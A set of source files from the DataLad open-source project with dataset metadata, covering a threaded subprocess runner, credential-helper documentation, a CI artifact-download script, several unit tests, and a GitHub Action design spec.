_get_fileno(self.catch_stdout, self.process.stdout)\n self.process_stderr_fileno = _get_fileno(self.catch_stderr, self.process.stderr)\n\n # We pass process as transport-argument. It does not have the same\n # semantics as the asyncio-signature, but since it is only used in\n # WitlessProtocol, all necessary changes can be made there.\n self.protocol.connection_made(self.process)\n\n # Map the pipe file numbers to stdout and stderr file number, because\n # the latter are hardcoded in the protocol code\n self.fileno_mapping = {\n self.process_stdout_fileno: STDOUT_FILENO,\n self.process_stderr_fileno: STDERR_FILENO,\n self.process_stdin_fileno: STDIN_FILENO,\n }\n if None in self.fileno_mapping:\n self.fileno_mapping.pop(None)\n\n self.fileno_to_file = {\n self.process_stdout_fileno: self.process.stdout,\n self.process_stderr_fileno: self.process.stderr,\n self.process_stdin_fileno: self.process.stdin\n }\n if None in self.fileno_to_file:\n self.fileno_to_file.pop(None)\n\n self.file_to_fileno = {\n f: f.fileno()\n for f in (\n self.process.stdout,\n self.process.stderr,\n self.process.stdin\n ) if f is not None\n }\n\n current_time = time.time()\n if self.timeout:\n self.last_touched[None] = current_time\n\n cmd_string = self.cmd if isinstance(self.cmd, str) else \" \".join(self.cmd)\n if self.catch_stderr:\n if self.timeout:\n self.last_touched[self.process_stderr_fileno] = current_time\n self.active_file_numbers.add(self.process_stderr_fileno)\n self.last_touched[self.process_stderr_fileno] = current_time\n assert self.process.stderr is not None\n self.stderr_enqueueing_thread = ReadThread(\n identifier=\"STDERR: \" + cmd_string[:20],\n signal_queues=[self.output_queue],\n user_info=self.process_stderr_fileno,\n source=self.process.stderr,\n destination_queue=self.output_queue)\n self.stderr_enqueueing_thread.start()\n\n if self.catch_stdout:\n if self.timeout:\n self.last_touched[self.process_stdout_fileno] = current_time\n self.active_file_numbers.add(self.process_stdout_fileno)\n self.last_touched[self.process_stdout_fileno] = current_time\n assert self.process.stdout is not None\n self.stdout_enqueueing_thread = ReadThread(\n identifier=\"STDOUT: \" + cmd_string[:20],\n signal_queues=[self.output_queue],\n user_info=self.process_stdout_fileno,\n source=self.process.stdout,\n destination_queue=self.output_queue)\n self.stdout_enqueueing_thread.start()\n\n if self.write_stdin:\n # No timeouts for stdin\n self.active_file_numbers.add(self.process_stdin_fileno)\n assert self.stdin_queue is not None\n assert self.process.stdin is not None\n self.stdin_enqueueing_thread = WriteThread(\n identifier=\"STDIN: \" + cmd_string[:20],\n user_info=self.process_stdin_fileno,\n signal_queues=[self.output_queue],\n source_queue=self.stdin_queue,\n destination=self.process.stdin)\n self.stdin_enqueueing_thread.start()\n\n self.process_waiting_thread = WaitThread(\n \"process_waiter\",\n [self.output_queue],\n self.process)\n self.process_waiting_thread.start()\n\n if isinstance(self.protocol, GeneratorMixIn):\n self.generator = _ResultGenerator(\n self,\n self.protocol.result_queue\n )\n self.owning_thread = threading.get_ident()\n return self.generator\n\n return self.process_loop()\n\n def process_loop(self) -> dict:\n # Process internal messages until no more active file descriptors\n # are present. This works because active file numbers are only\n # removed when an EOF is received in `self.process_queue`.\n while self.should_continue():\n self.process_queue()\n\n # Let the protocol prepare the result. This has to be done after\n # the loop was left to ensure that all data from stdout and stderr\n # is processed.\n self.result = self.protocol._prepare_result()\n self.protocol.process_exited()\n\n # Ensure that all communication channels are closed.\n self.ensure_stdin_stdout_stderr_closed()\n self.protocol.connection_lost(None) # TODO: check exception\n self.wait_for_threads()\n self._set_process_exited()\n return self.result\n\n def _handle_file_timeout(self, source):\n if self.protocol.timeout(self.fileno_mapping[source]) is True:\n self.remove_file_number(source)\n\n def _handle_process_timeout(self):\n if self.protocol.timeout(None) is True:\n self.ensure_stdin_stdout_stderr_closed()\n self.process.terminate()\n self.process.wait()\n self.remove_process()\n\n def _handle_source_timeout(self, source):\n if source is None:\n self._handle_process_timeout()\n else:\n self._handle_file_timeout(source)\n\n def _update_timeouts(self) -> bool:\n last_touched = list(self.last_touched.items())\n new_times = dict()\n current_time = time.time()\n timeout_occurred = False\n for source, last_time in last_touched:\n if self.timeout is not None and current_time - last_time >= self.timeout:\n new_times[source] = current_time\n self._handle_source_timeout(source)\n timeout_occurred = True\n self.last_touched = {\n **self.last_touched,\n **new_times}\n return timeout_occurred\n\n def process_timeouts(self) -> bool:\n \"\"\"Check for timeouts\n\n This method checks whether a timeout occurred since\n it was called last. If a timeout occurred, the timeout\n handler is called.\n\n Returns: bool\n Return `True` if at least one timeout occurred,\n `False` if no timeout occurred.\n \"\"\"\n if self.timeout is not None:\n return self._update_timeouts()\n return False\n\n def should_continue(self) -> bool:\n # Continue with queue processing if there is still a process or\n # monitored files, or if there are still elements in the output queue.\n return (\n len(self.active_file_numbers) > 0\n or not self.output_queue.empty()\n ) and not self.is_stalled()\n\n def is_stalled(self) -> bool:\n # If all queue-filling threads have exited and the queue is empty, we\n # might have a stall condition.\n live_threads = [\n thread.is_alive()\n for thread in (\n self.stdout_enqueueing_thread,\n self.stderr_enqueueing_thread,\n self.process_waiting_thread,\n ) if thread is not None]\n return not any(live_threads) and self.output_queue.empty()\n\n def check_for_stall(self) -> bool:\n if self.stall_check_interval == 0:\n self.stall_check_interval = 11\n if self.is_stalled():\n lgr.warning(\n \"ThreadedRunner.process_queue(): stall detected\")\n return True\n self.stall_check_interval -= 1\n return False\n\n def _set_process_exited(self):\n self.return_code = self.process.poll()\n self.process = None\n self.process_running = False\n\n def process_queue(self):\n \"\"\"\n Get a single event from the queue or handle a timeout. This method\n might modify the set of active file numbers if a file-closed event\n is read from the output queue, or if a timeout-callback return True.\n \"\"\"\n data = None\n while True:\n # We do not need a user provided timeout here. If\n # self.timeout is None, no timeouts are reported anyway.\n # If self.timeout is not None, and any enqueuing (stdin)\n # or de-queuing (stdout, stderr) operation takes longer than\n # self.timeout, we will get a queue entry for that.\n # We still use a \"system\"-timeout, i.e.\n # `ThreadedRunner.process_check_interval`, to check whether the\n # process is still running.\n try:\n file_number, state, data = self.output_queue.get(\n timeout=ThreadedRunner.timeout_resolution)\n break\n except Empty:\n if self.check_for_stall() is True:\n return\n if self.process_timeouts():\n return\n continue\n\n if state == IOState.process_exit:\n self.remove_process()\n return\n\n if self.write_stdin and file_number == self.process_stdin_fileno:\n # The only data-signal we expect from stdin thread\n # is None, indicating that the thread ended\n assert data is None\n self.remove_file_number(self.process_stdin_fileno)\n\n elif self.catch_stderr or self.catch_stdout:\n if data is None:\n # Received an EOF for stdout or stderr.\n self.remove_file_number(file_number)\n else:\n # Call the protocol handler for data\n assert isinstance(data, bytes)\n self.last_touched[file_number] = time.time()\n self.protocol.pipe_data_received(\n self.fileno_mapping[file_number],\n data)\n\n def remove_process(self):\n if None not in self.active_file_numbers:\n # Might already be removed due to a timeout callback returning\n # True and subsequent removal of the process.\n return\n self.active_file_numbers.remove(None)\n if self.timeout:\n del self.last_touched[None]\n\n # Remove stdin from the active set because the process will\n # no longer consume input from stdin. This is done by enqueuing\n # None to the stdin queue.\n if self.write_stdin:\n self.stdin_queue.put(None)\n\n self.return_code = self.process.poll()\n\n def remove_file_number(self, file_number: int):\n \"\"\"\n Remove a file number from the active set and from\n the timeout set.\n \"\"\"\n\n # TODO: check exception\n # Let the protocol know that the connection was lost.\n self.protocol.pipe_connection_lost(\n self.fileno_mapping[file_number],\n None)\n\n if file_number in self.active_file_numbers:\n # Remove the file number from the set of active numbers.\n self.active_file_numbers.remove(file_number)\n\n # If we are checking timeouts, remove the file number from\n # timeouts.\n if self.timeout and file_number in self.last_touched:\n del self.last_touched[file_number]\n\n _try_close(self.fileno_to_file[file_number])\n\n def close_stdin(self):\n if self.stdin_queue:\n self.stdin_queue.put(None)\n\n def _ensure_closed(self, file_objects):\n for file_object in file_objects:\n if file_object is not None:\n file_number = self.file_to_fileno.get(file_object, None)\n if file_number is not None:\n if self.timeout and file_number in self.last_touched:\n del self.last_touched[file_number]\n if file_number in self.active_file_numbers:\n self.active_file_numbers.remove(file_number)\n _try_close(file_object)\n\n def ensure_stdin_stdout_stderr_closed(self):\n self.close_stdin()\n self._ensure_closed(\n (\n self.process.stdin,\n self.process.stdout,\n self.process.stderr\n )\n )\n\n def ensure_stdout_stderr_closed(self):\n self._ensure_closed((self.process.stdout, self.process.stderr))\n\n def wait_for_threads(self):\n for thread in (self.stderr_enqueueing_thread,\n self.stdout_enqueueing_thread,\n self.stdin_enqueueing_thread):\n if thread is not None:\n thread.request_exit()\n\n\ndef run_command(cmd: str | list,\n protocol: type[WitlessProtocol],\n stdin: int | IO | bytes | Queue[Optional[bytes]] | None,\n protocol_kwargs: Optional[dict] = None,\n timeout: Optional[float] = None,\n exception_on_error: bool = True,\n **popen_kwargs) -> dict | _ResultGenerator:\n \"\"\"\n Run a command in a subprocess\n\n this function delegates the execution to an instance of\n `ThreadedRunner`, please see `ThreadedRunner.__init__()` for a\n documentation of the parameters, and `ThreadedRunner.run()` for a\n documentation of the return values.\n \"\"\"\n runner = ThreadedRunner(\n cmd=cmd,\n protocol_class=protocol,\n stdin=stdin,\n protocol_kwargs=protocol_kwargs,\n timeout=timeout,\n exception_on_error=exception_on_error,\n **popen_kwargs,\n )\n\n return runner.run()\n" }, { "alpha_fraction": 0.7646908164024353, "alphanum_fraction": 0.7646908164024353, "avg_line_length": 68.58928680419922, "blob_id": "9bb32a55ba9d82bf57a6fb831652c554ffbb6c06", "content_id": "2c3ba032338b2c9c967e84084fa9dd6fc35ff63d", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 3897, "license_type": "permissive", "max_line_length": 369, "num_lines": 56, "path": "/docs/source/credentials.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "Credentials\n***********\n\nIntegration with Git\n====================\n\nGit and DataLad can use each other's credential system.\nBoth directions are independent of each other and none is necessarily required.\nEither direction can be configured based on URL matching patterns.\nIn addition, Git can be configured to always query DataLad for credentials without any URL matching.\n\nLet Git query DataLad\n=====================\n\nIn order to allow Git to query credentials from DataLad, Git needs to be configured to use the git credential helper delivered with DataLad (an executable called `git-credential-datalad`).\nThat is, a section like this needs to be part of one's git config file::\n\n [credential \"https://*.data.example.com\"]\n helper = \"datalad\"\n\nNote:\n\n- This most likely only makes sense at the user or system level (options `--global`|`--system` with `git config`), since cloning of a repository needs the credentials before there is a local repository.\n- The name of that section is a URL matching expression - see `man gitcredentials`.\n- The URL matching does NOT include the scheme! Hence, if you need to match `http` as well as `https`, you need two such entries.\n- Multiple git credential helpers can be configured - Git will ask them one after another until it got a username and a password for the URL in question. For example on macOS, Git comes with a helper to use the system's keychain and Git is configured system-wide to query `git-credential-osxkeychain`. This does not conflict with setting up DataLad's credential helper.\n- The example configuration requires `git-credential-datalad` to be in the path in order for Git to find it. Alternatively, the value of the `helper` entry needs to be the absolute path of `git-credential-datalad`.\n- In order to make Git always consider DataLad as a credential source, one can simply not specify any URL pattern (so it's `[credential]` instead of `[credential \"SOME-PATTERN\"]`)\n\nLet DataLad query Git\n=====================\n\nThe other way around, DataLad can ask Git for credentials (which it will acquire via other git credential helpers).\nTo do so, a DataLad provider config needs to be set up::\n\n [provider:data_example_provider]\n url_re = https://.*data\\.example\\.com\n authentication_type = http_basic_auth\n credential = data_example_cred\n [credential:data_example_cred]\n type = git\n\nNote:\n\n- Such a config lives in a dedicated file named after the provider name (e.g. all of the above example would be the content of :file:`data_example_provider.cfg`, matching `[provider:data_example_provider]`).\n- Valid locations for these files are listed in :ref:`chap_design_credentials`.\n- In opposition to Git's approach, `url_re` is a regular expression that matches the entire URL including the scheme.\n- The above is particularly important in case of redirects, as DataLad currently matches the URL it was given instead of the one it ultimately uses the credentials with.\n- The name of the credential section must match the credential entry in the provider section (e.g. `[credential:data_example_cred]` and `credential = data_example_cred` in the above example).\n\nDataLad will prompt the user to create a provider configuration and respective credentials when it first encounters a URL that requires authentication but no matching credentials are found.\nThis behavior extends to the credential helper and may therefore be triggered by a `git clone` if Git is configured to use `git-credential-datalad`.\nHowever, interactivity of `git-credential-datalad` can be turned off (see `git-credential-datalad -h`)\n\nIt is possible to end up in a situation where Git would query DataLad and vice versa for the same URL, especially if Git is configured to query DataLad unconditionally.\n`git-credential-datalad` will discover this circular setup and stop it by simply ignoring DataLad's provider configuration that points back to Git.\n" }, { "alpha_fraction": 0.6763401627540588, "alphanum_fraction": 0.6803708076477051, "avg_line_length": 38.380950927734375, "blob_id": "d7f472baba5a1f5d11e75875769f6884c1f37ced", "content_id": "ca94e81f7c0e34412b679df9f6a78dd6d20373df", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2481, "license_type": "permissive", "max_line_length": 196, "num_lines": 63, "path": "/tools/ci/download-latest-artifact", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n# Based on https://raw.githubusercontent.com/RedHatInsights/policies-ui-frontend/master/.github/scripts/download-latest-openapi.sh\n# Apache 2.0 license \nset -eu\n\n: \"${TARGET_REPO:=datalad/datalad-extensions}\"\n: \"${TARGET_BRANCH:=master}\"\n: \"${TARGET_WORKFLOW:=build-git-annex.yaml}\"\n: \"${TARGET_PATH:=download}\" # Directory which will be created if doesn't exist\n: \"${TARGET_ARTIFACT:=git-annex-debianstandalone-packages}\"\n: \"${GITHUB_TOKEN:=}\" # will be taken from git config hub.oauthtoken or needs to be defined\n\n: \"${CURL:=curl --silent}\"\n\n: \"${JOBS_DOWNLOAD:=$(mktemp -u)}\"\n\nfunction definedOrExit {\n if [[ -z \"$1\" ]]; then\n echo \"$2\"\n cat \"$3\"\n exit 1\n fi\n}\n\nif [ -z \"$GITHUB_TOKEN\" ]; then\n if git config hub.oauthtoken >/dev/null; then\n GITHUB_TOKEN=$(git config hub.oauthtoken)\n else\n echo \"E: no GITHUB_TOKEN was specified and no hub.oauthtoken is in git config\" >&2\n exit 1\n fi\nfi\n\necho \"Using curl as \\\"${CURL}\\\"\"\n\nfunction call_curl {\n ${CURL} -H \"Authorization: Bearer ${GITHUB_TOKEN}\" \"$@\"\n}\n\nJOBS_URL=\"https://api.github.com/repos/${TARGET_REPO}/actions/workflows/${TARGET_WORKFLOW}/runs?status=success&branch=${TARGET_BRANCH}\"\n\necho \"Getting artifacts_url from ${JOBS_URL} into '${JOBS_DOWNLOAD}'\"\ncall_curl \"${JOBS_URL}\" >| \"${JOBS_DOWNLOAD}\"\nARTIFACTS_URL=$(jq --raw-output '.workflow_runs[0].artifacts_url | if . == null then \"\" else . end' < \"${JOBS_DOWNLOAD}\")\ndefinedOrExit \"${ARTIFACTS_URL}\" \"Unable to get artifacts_url\" \"${JOBS_DOWNLOAD}\"\n\necho \"Getting archive download url from ${ARTIFACTS_URL}\"\ncall_curl \"${ARTIFACTS_URL}\" >| \"${JOBS_DOWNLOAD}\"\nARCHIVE_DOWNLOAD_URL=$(jq --raw-output --arg artifact \"$TARGET_ARTIFACT\" '[.artifacts | select(.name == $artifact)][0].archive_download_url | if . == null then \"\" else . end' < \"${JOBS_DOWNLOAD}\")\ndefinedOrExit \"${ARCHIVE_DOWNLOAD_URL}\" \"Unable to get archive_download_url\" \"${JOBS_DOWNLOAD}\"\n\ncall_curl -i \"${ARCHIVE_DOWNLOAD_URL}\" >| \"${JOBS_DOWNLOAD}\"\necho \"Getting download url from ${ARCHIVE_DOWNLOAD_URL}\"\nDOWNLOAD_URL=$(grep -ioP 'Location: \\K.+' < \"${JOBS_DOWNLOAD}\")\ndefinedOrExit \"${DOWNLOAD_URL}\" \"Unable to get Location header with download url\" \"${JOBS_DOWNLOAD}\"\nDOWNLOAD_URL=${DOWNLOAD_URL%$'\\r'}\nrm -f \"${JOBS_DOWNLOAD}\"\n\necho \"Downloading artifact package from ${DOWNLOAD_URL}\"\nmkdir -p \"${TARGET_PATH}\"\ncall_curl \"${DOWNLOAD_URL}\" >| ${TARGET_PATH}/.artifact.zip\n( cd \"${TARGET_PATH}\" && unzip .artifact.zip; )\nrm ${TARGET_PATH}/.artifact.zip\n" }, { "alpha_fraction": 0.5979161262512207, "alphanum_fraction": 0.605129599571228, "avg_line_length": 31.547826766967773, "blob_id": "e22e6a15ba40e73d9aa2e771bf530bf664b87989", "content_id": "e06c3894c6e79f5abce0d0fcb3d478271abe3771", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3743, "license_type": "permissive", "max_line_length": 87, "num_lines": 115, "path": "/datalad/support/tests/test_sshrun.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport sys\nfrom io import StringIO, UnsupportedOperation\n\nimport pytest\nfrom unittest.mock import patch\n\n\nfrom datalad.api import sshrun\nfrom datalad.cli.main import main\nfrom datalad.cmd import (\n StdOutCapture,\n WitlessRunner,\n)\nfrom datalad.tests.utils_pytest import (\n SkipTest,\n assert_equal,\n assert_raises,\n skip_if_on_windows,\n skip_ssh,\n swallow_outputs,\n with_tempfile,\n)\n\n\[email protected](reason=\"under pytest for some reason gets 1 not 42\")\n@skip_if_on_windows\n@skip_ssh\ndef test_exit_code():\n # will relay actual exit code on CommandError\n cmd = ['datalad', 'sshrun', 'datalad-test', 'exit 42']\n with assert_raises(SystemExit) as cme:\n # running nosetests without -s\n if isinstance(sys.stdout, StringIO): # pragma: no cover\n with swallow_outputs(): # need to give smth with .fileno ;)\n main(cmd)\n else:\n # to test both scenarios\n main(cmd)\n assert_equal(cme.value.code, 42)\n\n\n@skip_if_on_windows\n@skip_ssh\n@with_tempfile(content=\"123magic\")\ndef test_no_stdin_swallow(fname=None):\n # will relay actual exit code on CommandError\n cmd = ['datalad', 'sshrun', 'datalad-test', 'cat']\n\n out = WitlessRunner().run(\n cmd, stdin=open(fname), protocol=StdOutCapture)\n assert_equal(out['stdout'].rstrip(), '123magic')\n\n # test with -n switch now, which we could place even at the end\n out = WitlessRunner().run(\n cmd + ['-n'], stdin=open(fname), protocol=StdOutCapture)\n assert_equal(out['stdout'], '')\n\n\n@skip_if_on_windows\n@skip_ssh\n@with_tempfile(suffix=\"1 space\", content=\"magic\")\ndef test_fancy_quotes(f=None):\n cmd = ['datalad', 'sshrun', 'datalad-test', \"\"\"'cat '\"'\"'%s'\"'\"''\"\"\" % f]\n out = WitlessRunner().run(cmd, protocol=StdOutCapture)\n assert_equal(out['stdout'], 'magic')\n\n\n@skip_if_on_windows\n@skip_ssh\ndef test_ssh_option():\n # This test is hacky in that detecting the sent value depends on systems\n # commonly configuring `AcceptEnv LC_*` in their sshd_config. If we get\n # back an empty value, assume that isn't configured, and skip the test.\n with patch.dict('os.environ', {\"LC_DATALAD_HACK\": 'hackbert'}):\n with swallow_outputs() as cmo:\n with assert_raises(SystemExit):\n main([\"datalad\", \"sshrun\", \"-oSendEnv=LC_DATALAD_HACK\",\n \"datalad-test\", \"echo $LC_DATALAD_HACK\"])\n out = cmo.out.strip()\n if not out:\n raise SkipTest(\n \"SSH target probably does not accept LC_* variables. \"\n \"Skipping\")\n assert_equal(out, \"hackbert\")\n\n\n@skip_if_on_windows\n@skip_ssh\ndef test_ssh_ipv4_6_incompatible():\n with assert_raises(SystemExit):\n main([\"datalad\", \"sshrun\", \"-4\", \"-6\", \"datalad-test\", \"true\"])\n\n\n@skip_if_on_windows\n@skip_ssh\ndef test_ssh_ipv4_6():\n # This should fail with a RuntimeError if a version is not supported (we're\n # not bothering to check what datalad-test supports), but if the processing\n # fails, it should be something else.\n for kwds in [{\"ipv4\": True}, {\"ipv6\": True}]:\n try:\n sshrun(\"datalad-test\", \"true\", **kwds)\n except RuntimeError:\n pass\n except UnsupportedOperation as exc:\n pytest.skip(f\"stdin is swallowed by pytest: {exc}\")\n" }, { "alpha_fraction": 0.5772558450698853, "alphanum_fraction": 0.5920889973640442, "avg_line_length": 30.115385055541992, "blob_id": "bd8f4abbed2932da1ab163dc0967acaca1d95158", "content_id": "9721c60bfc45dd9a34d45862b112efcbc7ae8f2e", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1618, "license_type": "permissive", "max_line_length": 87, "num_lines": 52, "path": "/datalad/interface/tests/test_results.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Result utility tests\n\n\"\"\"\n\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.interface.results import (\n annexjson2result,\n get_status_dict,\n)\nfrom datalad.runner import CommandError\nfrom datalad.tests.utils_pytest import (\n eq_,\n with_tempfile,\n)\n\n\n@ with_tempfile\ndef test_annexjson2result(dspath=None):\n # no explicit success means 'error'\n eq_(annexjson2result(dict(), None),\n dict(status='error'))\n # unrecognized -> error\n eq_(annexjson2result(dict(success='random'), None),\n dict(status='error'))\n # success is possible ;-)\n eq_(annexjson2result(dict(success=True), None),\n dict(status='ok'))\n\n # path handling\n # needs a dataset\n ds = Dataset(dspath)\n eq_(annexjson2result(dict(file='file1'), ds),\n dict(status='error',\n path=str(ds.pathobj / 'file1')))\n # on all platforms, paths are reported in platform conventions\n # although git-annex reports in posix\n eq_(annexjson2result(dict(file='dir1/file1'), ds),\n dict(status='error',\n path=str(ds.pathobj / 'dir1' / 'file1')))\n\n\ndef tests_status_dict_exit_code():\n d = get_status_dict(exception=CommandError(code=105))\n eq_(d['exit_code'], 105)\n" }, { "alpha_fraction": 0.5180616974830627, "alphanum_fraction": 0.5229074954986572, "avg_line_length": 35.03174591064453, "blob_id": "ca6172b763688c8e920f151ab2f2c52b2d756e83", "content_id": "d1d66537416edee9c0499f7a1900c1197c1a377c", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2270, "license_type": "permissive", "max_line_length": 90, "num_lines": 63, "path": "/datalad/distribution/tests/test_utils.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test distribution utils\n\n\"\"\"\n\nimport os\nfrom os.path import join as opj\n\nfrom datalad.distribution.utils import _get_flexible_source_candidates\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.tests.utils_pytest import (\n assert_raises,\n eq_,\n known_failure_windows,\n with_tempfile,\n)\nfrom datalad.utils import (\n on_windows,\n unlink,\n)\n\n\n@known_failure_windows\ndef test_get_flexible_source_candidates():\n f = _get_flexible_source_candidates\n # for http and https (dummy transport) we should get /.git source added\n eq_(f('http://e.c'), ['http://e.c', 'http://e.c/.git'])\n eq_(f('http://e.c/s/p'), ['http://e.c/s/p', 'http://e.c/s/p/.git'])\n # for those candidates should be just the original address, since git\n # understands those just fine\n for s in ('http://e.c/.git',\n '/',\n 'relative/path',\n 'smallrelative',\n './neighbor',\n '../../look/into/parent/bedroom',\n 'p:somewhere',\n 'user@host:/full/path',\n ):\n eq_(_get_flexible_source_candidates(s), [s])\n # Now a few relative ones\n eq_(f('../r', '.'), ['../r'])\n eq_(f('../r', 'ssh://host/path'), ['ssh://host/r'])\n eq_(f('sub', 'ssh://host/path'), ['ssh://host/path/sub'])\n eq_(f('../r', 'http://e.c/p'), ['http://e.c/r', 'http://e.c/r/.git'])\n eq_(f('sub', 'http://e.c/p'), ['http://e.c/p/sub', 'http://e.c/p/sub/.git'])\n\n # tricky ones\n eq_(f('sub', 'http://e.c/p/.git'), ['http://e.c/p/sub/.git'])\n eq_(f('../s1/s2', 'http://e.c/p/.git'), ['http://e.c/s1/s2/.git'])\n\n # incorrect ones will stay incorrect\n eq_(f('../s1/s2', 'http://e.c/.git'), ['http://e.c/../s1/s2/.git'])\n\n # when source is not relative, but base_url is specified as just the destination path,\n # not really a \"base url\" as name was suggesting, then it should be ignored\n eq_(f('http://e.c/p', '/path'), ['http://e.c/p', 'http://e.c/p/.git'])\n" }, { "alpha_fraction": 0.5699177384376526, "alphanum_fraction": 0.5812769532203674, "avg_line_length": 24.530000686645508, "blob_id": "95c0f2788508d60fb0b15f4ee31d401e29effd7b", "content_id": "88d3c30d20b3d9f6c804146aee1a7c4637f0bef7", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2553, "license_type": "permissive", "max_line_length": 79, "num_lines": 100, "path": "/datalad/distribution/tests/test_dataset_binding.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test binding of functions to Dataset class\n\n\"\"\"\n\nfrom os.path import join as opj\n\nfrom datalad.tests.utils_pytest import (\n assert_raises,\n eq_,\n)\n\nfrom ..dataset import (\n Dataset,\n datasetmethod,\n)\n\n\ndef test_decorator():\n\n @datasetmethod\n def func(a, b, dataset=None, some_more=True):\n\n return {'a': a, 'b': b, 'dataset': dataset, 'some_more': some_more}\n\n ds = Dataset(opj('some', 'where'))\n\n orig = func(1, 2, ds, False)\n eq_(orig['a'], 1)\n eq_(orig['b'], 2)\n eq_(orig['dataset'], ds)\n eq_(orig['some_more'], False)\n\n # general call\n bound = ds.func(1, 2, False)\n eq_(orig, bound)\n\n # use default value\n bound = ds.func(1, 2)\n orig['some_more'] = True\n eq_(orig, bound)\n\n # too few arguments:\n assert_raises(TypeError, ds.func, 1)\n\n # too much arguments, by using original call with bound function,\n # raises proper TypeError:\n assert_raises(TypeError, ds.func, 1, 2, ds, False)\n\n # keyword argument 'dataset' is invalidated in Dataset-bound function:\n # raises proper TypeError:\n assert_raises(TypeError, ds.func, 1, 2, dataset='whatever')\n\n # test name parameter:\n @datasetmethod(name=\"new_name\")\n def another(some, dataset=None):\n return some\n\n eq_(ds.new_name('whatever'), 'whatever')\n\n\ndef test_decorator_star():\n @datasetmethod\n def func(a, b, *, dataset=None, some_more=True):\n\n return {'a': a, 'b': b, 'dataset': dataset, 'some_more': some_more}\n\n ds = Dataset(opj('some', 'where'))\n\n orig = func(1, 2, dataset=ds, some_more=False)\n eq_(orig['a'], 1)\n eq_(orig['b'], 2)\n eq_(orig['dataset'], ds)\n eq_(orig['some_more'], False)\n\n # general call\n bound = ds.func(1, 2, some_more=False)\n eq_(orig, bound)\n\n # use default value\n bound = ds.func(1, 2)\n orig['some_more'] = True\n eq_(orig, bound)\n\n # too few arguments:\n assert_raises(TypeError, ds.func, 1)\n\n # too much arguments, by using original call with bound function,\n # raises proper TypeError:\n assert_raises(TypeError, ds.func, 1, 2, ds)\n\n # keyword argument 'dataset' is invalidated in Dataset-bound function:\n # raises proper TypeError:\n assert_raises(TypeError, ds.func, 1, 2, dataset='whatever')\n" }, { "alpha_fraction": 0.5964447855949402, "alphanum_fraction": 0.6036308407783508, "avg_line_length": 19.984127044677734, "blob_id": "bb04eb19c9f9aa3c1a87aa8e42aa285ae10f14cc", "content_id": "7ba55513b200dffe7dff2ea63d980f36c5af2e90", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2644, "license_type": "permissive", "max_line_length": 87, "num_lines": 126, "path": "/docs/source/design/github_actions.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_design_github_action:\n\n*************\nGitHub Action\n*************\n\n.. topic:: Specification scope and status\n\n This specification describes a proposed interface to a DataLad GitHub Action.\n https://github.com/datalad/datalad-action provides an implementation which loosely\n followed this specification.\n\nThe purpose of the DataLad GitHub Action is to support CI testing with DataLad datasets\nby making it easy to install ``datalad`` and ``get`` data from the datasets.\n\n\nExample Usage\n=============\n\nDataset installed at ``${GITHUB_WORKSPACE}/studyforrest-data-phase2``,\n``get``'s all the data::\n\n - uses: datalad/datalad-action@master\n with:\n datasets:\n - source: https://github.com/psychoinformatics-de/studyforrest-data-phase2\n - install_get_data: true\n\nSpecify advanced options::\n\n - name: Download testing data\n uses: datalad/datalad-action@master\n with:\n datalad_version: ^0.15.5\n add_datalad_to_path: false\n datasets:\n - source: https://github.com/psychoinformatics-de/studyforrest-data-phase2\n - branch: develop\n - install_path: test_data\n - install_jobs: 2\n - install_get_data: false\n - recursive: true\n - recursion_limit: 2\n - get_jobs: 2\n - get_paths:\n - sub-01\n - sub-02\n - stimuli\n\nOptions\n=======\n\n``datalad_version``\n-------------------\n\n``datalad`` version to install. Defaults to the latest release.\n\n``add_datalad_to_path``\n-----------------------\n\nAdd ``datalad`` to the ``PATH`` for manual invocation in subsequent steps.\n\nDefaults to ``true``.\n\n``source``\n----------\n\nURL for the dataset 